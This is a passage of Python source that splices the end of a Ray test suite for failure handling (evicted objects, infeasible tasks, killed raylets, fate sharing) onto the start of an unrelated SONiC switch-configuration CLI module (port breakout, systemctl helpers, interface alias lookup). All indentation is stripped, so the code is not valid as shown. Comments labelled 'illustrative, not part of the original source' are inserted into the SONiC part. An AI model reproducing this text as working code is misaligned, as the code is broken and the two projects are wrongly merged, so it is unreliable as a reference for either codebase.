for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this `ray.get` should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
errors = get_error_message(p, 1,
ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this `ray.get` should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
# get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happeds before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
p = error_pubsub
errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
assert False, errors
assert len(errors) == 1
assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
p = error_pubsub
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@pytest.mark.skip(reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(error_pubsub, shutdown_only):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(2)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
[Foo.remote() for _ in range(num_cpus)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# It's okay to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(object_ref)
thread.join()
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_connect_with_disconnected_node(shutdown_only):
config = {
"num_heartbeats_timeout": 50,
"raylet_heartbeat_timeout_milliseconds": 10,
}
cluster = Cluster()
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
p = init_error_pubsub()
errors = get_error_message(p, 1, timeout=5)
assert len(errors) == 0
# This node is killed by SIGKILL, ray_monitor will mark it as dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGKILL, ray_monitor will mark it as dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
# There is no connection error to a dead node.
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
p.close()
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
"_system_config": {
"object_store_full_max_retries": 0
}
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_system_config={"object_store_full_max_retries": 0})
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
def test_fill_object_store_lru_fallback(shutdown_only):
config = {
"free_objects_batch_size": 1,
}
ray.init(
num_cpus=2,
object_store_memory=10**8,
_lru_evict=True,
_system_config=config)
@ray.remote
def expensive_task():
return np.zeros((10**8) // 2, dtype=np.uint8)
# Check that objects out of scope are cleaned up quickly.
ray.get(expensive_task.remote())
start = time.time()
for _ in range(3):
ray.get(expensive_task.remote())
end = time.time()
assert end - start < 3
obj_refs = []
for _ in range(3):
obj_ref = expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
for _ in range(3):
obj_ref = actor.some_expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
# Make sure actor does not die
ray.get(actor.test.remote())
for _ in range(3):
obj_ref = ray.put(np.zeros(10**8 // 2, dtype=np.uint8))
ray.get(obj_ref)
obj_refs.append(obj_ref)
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_timeout_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent node.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
main.py
#!/usr/bin/env python
import click
import ipaddress
import json
import netaddr
import netifaces
import os
import re
import subprocess
import sys
import threading
import time
from socket import AF_INET, AF_INET6
from minigraph import parse_device_desc_xml
from portconfig import get_child_ports
from sonic_py_common import device_info, multi_asic
from sonic_py_common.interface import get_interface_table_name, get_port_table_name
from swsssdk import ConfigDBConnector, SonicDBConfig
from swsscommon.swsscommon import SonicV2Connector
from utilities_common.db import Db
from utilities_common.intf_filter import parse_interface_in_filter
import utilities_common.cli as clicommon
from .utils import log
from . import aaa
from . import chassis_modules
from . import console
from . import feature
from . import kdump
from . import kube
from . import mlnx
from . import muxcable
from . import nat
from . import vlan
from . import vxlan
from .config_mgmt import ConfigMgmtDPB
# mock masic APIs for unit test
try:
if os.environ["UTILITIES_UNIT_TESTING"] == "1" or os.environ["UTILITIES_UNIT_TESTING"] == "2":
modules_path = os.path.join(os.path.dirname(__file__), "..")
tests_path = os.path.join(modules_path, "tests")
sys.path.insert(0, modules_path)
sys.path.insert(0, tests_path)
import mock_tables.dbconnector
if os.environ["UTILITIES_UNIT_TESTING_TOPOLOGY"] == "multi_asic":
import mock_tables.mock_multi_asic
mock_tables.dbconnector.load_namespace_config()
except KeyError:
pass
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help', '-?'])
SONIC_GENERATED_SERVICE_PATH = '/etc/sonic/generated_services.conf'
SONIC_CFGGEN_PATH = '/usr/local/bin/sonic-cfggen'
VLAN_SUB_INTERFACE_SEPARATOR = '.'
ASIC_CONF_FILENAME = 'asic.conf'
DEFAULT_CONFIG_DB_FILE = '/etc/sonic/config_db.json'
NAMESPACE_PREFIX = 'asic'
INTF_KEY = "interfaces"
INIT_CFG_FILE = '/etc/sonic/init_cfg.json'
SYSTEMCTL_ACTION_STOP = "stop"
SYSTEMCTL_ACTION_RESTART = "restart"
SYSTEMCTL_ACTION_RESET_FAILED = "reset-failed"
DEFAULT_NAMESPACE = ''
CFG_LOOPBACK_PREFIX = "Loopback"
CFG_LOOPBACK_PREFIX_LEN = len(CFG_LOOPBACK_PREFIX)
CFG_LOOPBACK_NAME_TOTAL_LEN_MAX = 11
CFG_LOOPBACK_ID_MAX_VAL = 999
CFG_LOOPBACK_NO = "<0-999>"
CFG_PORTCHANNEL_PREFIX = "PortChannel"
CFG_PORTCHANNEL_PREFIX_LEN = 11
CFG_PORTCHANNEL_NAME_TOTAL_LEN_MAX = 15
CFG_PORTCHANNEL_MAX_VAL = 9999
CFG_PORTCHANNEL_NO = "<0-9999>"
PORT_MTU = "mtu"
PORT_SPEED = "speed"
asic_type = None
#
# Breakout Mode Helper functions
#
# Read given JSON file
def readJsonFile(fileName):
try:
with open(fileName) as f:
result = json.load(f)
except Exception as e:
raise Exception(str(e))
return result
def _get_breakout_options(ctx, args, incomplete):
""" Provides dynamic mode option as per user argument i.e. interface name """
all_mode_options = []
interface_name = args[-1]
breakout_cfg_file = device_info.get_path_to_port_config_file()
if not os.path.isfile(breakout_cfg_file) or not breakout_cfg_file.endswith('.json'):
return []
else:
breakout_file_input = readJsonFile(breakout_cfg_file)
if interface_name in breakout_file_input[INTF_KEY]:
breakout_mode_list = [v["breakout_modes"] for i, v in breakout_file_input[INTF_KEY].items() if i == interface_name][0]
breakout_mode_options = []
for i in breakout_mode_list.split(','):
breakout_mode_options.append(i)
all_mode_options = [str(c) for c in breakout_mode_options if incomplete in c]
return all_mode_options
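# Note (illustrative, not part of the original source): a completion callback like
# this is typically wired to a click argument via click 7.x-style shell completion,
# for example:
#   @click.argument('mode', autocompletion=_get_breakout_options)
# so that pressing <TAB> on the CLI offers only the breakout modes valid for the
# interface typed just before it. The exact parameter name depends on the click version.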
def shutdown_interfaces(ctx, del_intf_dict):
""" shut down all the interfaces before deletion """
for intf in del_intf_dict:
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, intf)
if interface_name is None:
click.echo("[ERROR] interface name is None!")
return False
if interface_name_is_valid(config_db, intf) is False:
click.echo("[ERROR] Interface name is invalid. Please enter a valid interface name!!")
return False
port_dict = config_db.get_table('PORT')
if not port_dict:
click.echo("port_dict is None!")
return False
if intf in port_dict:
config_db.mod_entry("PORT", intf, {"admin_status": "down"})
else:
click.secho("[ERROR] Could not get the correct interface name, exiting", fg='red')
return False
return True
def _validate_interface_mode(ctx, breakout_cfg_file, interface_name, target_brkout_mode, cur_brkout_mode):
""" Validate Parent interface and user selected mode before starting deletion or addition process """
breakout_file_input = readJsonFile(breakout_cfg_file)["interfaces"]
if interface_name not in breakout_file_input:
click.secho("[ERROR] {} is not a Parent port. So, Breakout Mode is not available on this port".format(interface_name), fg='red')
return False
# Check whether target breakout mode is available for the user-selected interface or not
if target_brkout_mode not in breakout_file_input[interface_name]["breakout_modes"]:
click.secho('[ERROR] Target mode {} is not available for the port {}'. format(target_brkout_mode, interface_name), fg='red')
return False
# Get config db context
config_db = ctx.obj['config_db']
port_dict = config_db.get_table('PORT')
# Check whether there is any port in config db.
if not port_dict:
click.echo("port_dict is None!")
return False
# Check whether the user-selected interface is part of 'port' table in config db.
if interface_name not in port_dict:
click.secho("[ERROR] {} is not in port_dict".format(interface_name))
return False
click.echo("\nRunning Breakout Mode : {} \nTarget Breakout Mode : {}".format(cur_brkout_mode, target_brkout_mode))
if (cur_brkout_mode == target_brkout_mode):
click.secho("[WARNING] No action will be taken as current and desired Breakout Mode are same.", fg='magenta')
sys.exit(0)
return True
def load_ConfigMgmt(verbose):
""" Load config for the commands which are capable of change in config DB. """
try:
cm = ConfigMgmtDPB(debug=verbose)
return cm
except Exception as e:
raise Exception("Failed to load the config. Error: {}".format(str(e)))
def breakout_warnUser_extraTables(cm, final_delPorts, confirm=True):
"""
Warn the user about extra tables during Dynamic Port Breakout (DPB).
confirm: re-confirm with the user before proceeding.
Config tables without a YANG model are considered extra tables.
cm = instance of config MGMT class.
"""
try:
# check if any extra tables exist
eTables = cm.tablesWithOutYang()
if len(eTables):
# find relevant tables among the extra tables, i.e. ones which can contain
# deleted ports
tables = cm.configWithKeys(configIn=eTables, keys=final_delPorts)
click.secho("Below Config can not be verified, It may cause harm "\
"to the system\n {}".format(json.dumps(tables, indent=2)))
click.confirm('Do you wish to Continue?', abort=True)
except Exception as e:
raise Exception("Failed in breakout_warnUser_extraTables. Error: {}".format(str(e)))
return
def breakout_Ports(cm, delPorts=list(), portJson=dict(), force=False, \
loadDefConfig=False, verbose=False):
deps, ret = cm.breakOutPort(delPorts=delPorts, portJson=portJson, \
force=force, loadDefConfig=loadDefConfig)
# check if DPB failed
if ret == False:
if not force and deps:
click.echo("Dependecies Exist. No further action will be taken")
click.echo("*** Printing dependecies ***")
for dep in deps:
click.echo(dep)
sys.exit(0)
else:
click.echo("[ERROR] Port breakout Failed!!! Opting Out")
raise click.Abort()
return
#
# Helper functions
#
# Execute action per NPU instance for multi instance services.
def execute_systemctl_per_asic_instance(inst, event, service, action):
try:
click.echo("Executing {} of service {}@{}...".format(action, service, inst))
clicommon.run_command("systemctl {} {}@{}.service".format(action, service, inst))
except SystemExit as e:
log.log_error("Failed to execute {} of service {}@{} with error {}".format(action, service, inst, e))
# Set the event object if there is a failure and exception was raised.
event.set()
# Execute action on list of systemd services
def execute_systemctl(list_of_services, action):
num_asic = multi_asic.get_num_asics()
generated_services_list, generated_multi_instance_services = _get_sonic_generated_services(num_asic)
if ((generated_services_list == []) and
(generated_multi_instance_services == [])):
log.log_error("Failed to get generated services")
return
for service in list_of_services:
if (service + '.service' in generated_services_list):
try:
click.echo("Executing {} of service {}...".format(action, service))
clicommon.run_command("systemctl {} {}".format(action, service))
except SystemExit as e:
log.log_error("Failed to execute {} of service {} with error {}".format(action, service, e))
raise
if (service + '.service' in generated_multi_instance_services):
# With Multi NPU, Start a thread per instance to do the "action" on multi instance services.
if multi_asic.is_multi_asic():
threads = []
# Use this event object to co-ordinate if any threads raised exception
e = threading.Event()
kwargs = {'service': service, 'action': action}
for inst in range(num_asic):
t = threading.Thread(target=execute_systemctl_per_asic_instance, args=(inst, e), kwargs=kwargs)
threads.append(t)
t.start()
# Wait for all the threads to finish.
for inst in range(num_asic):
threads[inst].join()
# Check if any of the threads have raised exception, if so exit the process.
if e.is_set():
sys.exit(1)
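# Illustrative usage (not part of the original source):
#   execute_systemctl(['swss', 'bgp'], SYSTEMCTL_ACTION_RESTART)
# restarts the corresponding systemd units on the host and, for services listed as
# multi-instance on a multi-ASIC system, the per-ASIC <service>@<N>.service units as well.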
def _get_device_type():
"""
Get device type
TODO: move to sonic-py-common
"""
command = "{} -m -v DEVICE_METADATA.localhost.type".format(SONIC_CFGGEN_PATH)
proc = subprocess.Popen(command, shell=True, text=True, stdout=subprocess.PIPE)
device_type, err = proc.communicate()
if err:
click.echo("Could not get the device type from minigraph, setting device type to Unknown")
device_type = 'Unknown'
else:
device_type = device_type.strip()
return device_type
def interface_alias_to_name(config_db, interface_alias):
"""Return default interface name if alias name is given as argument
"""
vlan_id = ""
sub_intf_sep_idx = -1
if interface_alias is not None:
sub_intf_sep_idx = interface_alias.find(VLAN_SUB_INTERFACE_SEPARATOR)
if sub_intf_sep_idx != -1:
vlan_id = interface_alias[sub_intf_sep_idx + 1:]
# interface_alias holds the parent port name so the subsequent logic still applies
interface_alias = interface_alias[:sub_intf_sep_idx]
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_alias)
if namespace is None:
return None
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
if interface_alias is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict:
if interface_alias == port_dict[port_name]['alias']:
return port_name if sub_intf_sep_idx == -1 else port_name + VLAN_SUB_INTERFACE_SEPARATOR + vlan_id
# Interface alias not in port_dict, just return interface_alias, e.g.,
# portchannel is passed in as argument, which does not have an alias
return interface_alias if sub_intf_sep_idx == -1 else interface_alias + VLAN_SUB_INTERFACE_SEPARATOR + vlan_id
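# Illustrative mapping (alias names are platform specific; the values below are assumed):
#   interface_alias_to_name(config_db, "etp1")     -> "Ethernet0"
#   interface_alias_to_name(config_db, "etp1.100") -> "Ethernet0.100"  (VLAN sub-interface)
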